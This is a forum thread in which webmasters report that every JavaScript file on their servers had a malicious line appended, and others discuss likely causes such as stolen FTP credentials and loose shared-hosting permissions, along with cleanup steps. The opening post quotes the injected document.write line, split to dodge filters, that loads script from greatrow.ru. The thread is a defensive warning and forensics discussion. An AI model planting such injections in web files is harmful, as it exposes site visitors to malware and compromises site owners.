Attention: Javascript Hack Going Around

[Latox]

There is currently somebody, somewhere going around to websites/servers and editing their .js files.

I was on my website today and saw "greatrow.ru" loading... I was like what the hell?

So I opened httpfox, and saw a .js file loading into my site.

Image: http://www.freemoviedb.com/imgs/greatrow_example.jpg

I checked my source code, nothing had been changed.

I checked my javascript files, ALL of the javascript files on the account had been edited at the same time, and this line had been placed at the bottom of each .js file:

Code JavaScript:

document.write('<sc'+'ript type="text/javascript"
src="http://greatrow.ru/Unfriend.js"></scri'+'pt>');

I then checked the other sites on my server, EVERY site on my server, EVERY javascript file on my server had this piece of code inserted at the bottom.

The greatrow.ru site scans as a virus/malicious - so be careful, check your site - check your .js files.

I didn't download anything nor give anyone access and every .js file was edited?

Heads up!

I'd like to hear some feedback on this also, as I'm not really knowledgeable when it comes to web security, hacking, etc.

I'd also like to hear if it has happened to you.

[WeWatch]

When performing website forensics, always look for the common denominator first.

Is it your dedicated server?

If so, who has FTP access to the root of the websites?

What website software does each website have? Wordpress? Joomla? osCommerce? ZenCart? All of these have been recent targets (as they are all the time). Be certain all your software is updated and the plugins too.

Do you have the FTP logs? What about the access logs?

Provide more details and I can help you solve the problem of "how"?

[biggybiggysmally]

Happened to me aswell.
But it was greatrow.ru/Web_host.js
Noone should have access to my ftp-account, but its webspace, maybe the server got hacked and a program added this line to each .js on the whole webserver?
I don't run any CMS or something, only like 5 PHP scripts which access to the mysql database and a single javascript file.

[WeWatch]

You're correct - nobody "should" have access to your FTP but when you rule out the vulnerabilities of CMS's it sounds an awful lot like compromised FTP credentials.

They it typically happens is this; because there are so many viruses running around the Internet, many of today's best anti-virus products can't stop them all. Sometimes, a virus slips through the best defenses. These viruses look for the file containing the FTP credentials, reads the info, sends it to a server which then infects the website(s) it now has legitimate credentials for.

First, I would suggest you change all FTP passwords - immediately.

Second, scan all PCs for viruses. Make sure you do a full scan. Too many times we discover that people don't set their anti-virus programs to do full system scans. So, if a virus was released on Monday and your anti-virus program didn't get the signature until Tuesday, without doing a full system scan, your anti-virus program would never know it's there.

Then, remove the infection from all your .js files and look at all .php files for any unnecessary base64_decode strings.

Post back here with any other questions you have.

[biggybiggysmally]

There is no file containing the ftp credentials.
Of course, I already removed the "infections".
Website runs on a shared host. If the host gets hacked, I can't do anything against it.

[WeWatch]

What FTP software are you using?

[Aleksejs]

First of all - ask your hosting provider, that they offer something more secure than FTP. SFTP or FTPS So that at least your password is not sent unencrypted.

[CoastWeb]

Happened to me aswell.
But it was greatrow.ru/Web_host.js
Noone should have access to my ftp-account, but its webspace, maybe the server got hacked and a program added this line to each .js on the whole webserver?
I don't run any CMS or something, only like 5 PHP scripts which access to the mysql database and a single javascript file.

Often other users accounts on shared hosting can access your files if the file permissions are set to 777. Its then a simple matter using the compromised account to scan for writable files (html, php, js) and add the javascript to every writable file it finds on the server.